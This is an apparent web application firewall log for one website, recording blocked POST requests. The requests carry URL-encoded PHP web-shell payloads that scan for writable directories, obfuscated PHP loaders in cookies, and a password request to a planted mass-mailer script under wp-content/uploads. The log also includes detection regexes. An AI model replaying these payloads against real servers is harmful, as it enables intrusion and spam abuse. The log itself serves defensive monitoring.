3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvET8vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaIwo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\n\nDo=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 07:20:24","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Td:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36\nhost:dewenlabels.com\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nupgrade-insecure-requests:1\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:3339\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvITDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvLI9coaAypaEco24vB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\n\nTd=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 08:53:18","185.66.142.41","POST","\/wp-content\/uploads\/ixvwpum\/fyeokvi\/afxribd\/index.php?pass=GIMh2dk56st",null,"post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-content\/uploads\/ixvwpum\/fyeokvi\/afxribd\/index.php?pass=GIMh2dk56st HTTP\/1.1\ncontent-length:1324\naccept:*\/*\nhost:dewenlabels.com\ncontent-type:multipart\/form-data; boundary=------------------------kw8cVbsGc2scZIFmtB8wSh\n\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"pass\"\r\n\r\nGIMh2dk56st\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"senderName\"\r\n\r\nFresh\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"subject\"\r\n\r\nSend test\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"charset\"\r\n\r\nUTF-8\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"replyTo\"\r\n\r\n\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"encode\"\r\n\r\n8bit\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"messageLetter\"\r\n\r\nTest mail\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"emailList\"\r\n\r\ninfo@dewenlabels.com\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"messageType\"\r\n\r\n1\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"attachment[]\"; filename=\"\/tmp\/phpmScVEz\"\r\nContent-Type: application\/octet-stream\r\n\r\n\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nsend\r\n--------------------------kw8cVbsGc2scZIFmtB8wSh--\r\n"]
["2026-05-16 09:45:57","213.209.159.254","POST","\/","Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> AR:%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B","POST \/ HTTP\/1.1\nsec-fetch-dest:document\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nsec-fetch-site:none\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvDIVvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWypKIyp3EmVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-fetch-mode:navigate\ncontent-length:250\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nAR=%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B"]
["2026-05-16 10:19:10","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Gb:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvE2VvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYz9vK2ywo252K2uuozEfMFV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\nsec-ch-ua:\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\nsec-fetch-mode:navigate\nsec-ch-ua-platform:\"macOS\"\nhost:dewenlabels.com\nsec-fetch-user:?1\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:3339\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\n\nGb=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 10:19:45","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> gd:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvM2DvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvZy9wo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\nsec-ch-ua:\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\nsec-fetch-mode:navigate\nsec-ch-ua-platform:\"macOS\"\nhost:dewenlabels.com\nsec-fetch-user:?1\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-length:3339\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\n\ngd=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20